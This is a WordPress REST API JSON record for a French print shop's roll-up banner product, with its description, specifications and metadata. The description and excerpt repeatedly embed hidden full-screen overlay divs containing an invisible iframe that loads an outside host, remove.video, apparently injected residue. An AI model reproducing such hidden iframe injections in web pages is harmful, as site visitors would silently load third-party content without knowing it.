{"id":1727,"date":"2020-11-11T20:14:10","date_gmt":"2020-11-11T19:14:10","guid":{"rendered":"https:\/\/imprimerie-copylux.fr\/?post_type=product&#038;p=1727"},"modified":"2020-12-02T14:59:58","modified_gmt":"2020-12-02T13:59:58","slug":"roll-up","status":"publish","type":"product","link":"https:\/\/imprimerie-copylux.fr\/index.php\/product\/roll-up\/","title":{"rendered":"Roll-up Alu Taille moyenne"},"content":{"rendered":"<p data-children-count=\"0\"><span data-children-count=\"0\">Donnez de la <strong>visibilit\u00e9<\/strong> \u00e0 vos produits ou \u00e0 votre entreprise \u00e0 l\u2019occasion d\u2019un salon, d\u2019une foire ou d\u2019une expo.<\/span><\/p>\n<p data-children-count=\"0\"><span data-children-count=\"0\">Facile \u00e0 monter et r\u00e9sistant dans le temps, le Roll-up offre une tr\u00e8s belle surface d\u2019affichage avec une impression aux couleurs vives.<\/span><\/p>\n<p data-children-count=\"0\"><span data-children-count=\"0\">Nous imprimons votre roll-up sur de la toile Dickson garantissant sa robustesse, il sera aussi anti-inflammable pour qu\u2019il puisse \u00eatre expos\u00e9 lors de salon. <\/span><span data-children-count=\"0\">Il ne se gondole pas car imprim\u00e9 sur de la toile autoportante.<br \/>\n<\/span><\/p>\n<p data-children-count=\"0\"><strong data-children-count=\"0\">Assemblage en 2 minutes seulement !<\/strong><\/p>\n<ul data-children-count=\"0\">\n<li>Dimension : 85 \u00d7 200 cm<\/li>\n<li>Impression quadrichromie recto avec des\u00a0 encres\u00a0 anti UV<\/li>\n<li><strong>Support : toile opaque \u00e9cologique &#8211; dos gris opaque &#8211; class\u00e9e M1 anti curling &#8211; 330 gr<br \/>\n<\/strong><\/li>\n<li>Structure en aluminium r\u00e9sistant &#8211; Carter avec enrouleur \u00e0 ressort + 1 m\u00e2t pliable<\/li>\n<li>Poids total : 2,3 kg<\/li>\n<li><strong>Livr\u00e9 avec sa housse de transport<\/strong><\/li>\n<li><strong>Usage int\u00e9rieur &#8211; ext\u00e9rieur d\u00e9conseill\u00e9<br \/>\n<\/strong><\/li>\n<\/ul>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Donnez de la visibilit\u00e9 \u00e0 votre association, vos produits ou \u00e0 votre entreprise gr\u00e2ce au Roll-up !<\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n","protected":false},"featured_media":1835,"template":"","meta":[],"product_brand":[],"product_cat":[55],"product_tag":[],"class_list":{"0":"post-1727","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-signaletique","8":"first","9":"instock","10":"featured","11":"shipping-taxable","12":"purchasable","13":"product-type-variable"},"_links":{"self":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product\/1727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media\/1835"}],"wp:attachment":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media?parent=1727"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_brand?post=1727"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_cat?post=1727"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_tag?post=1727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}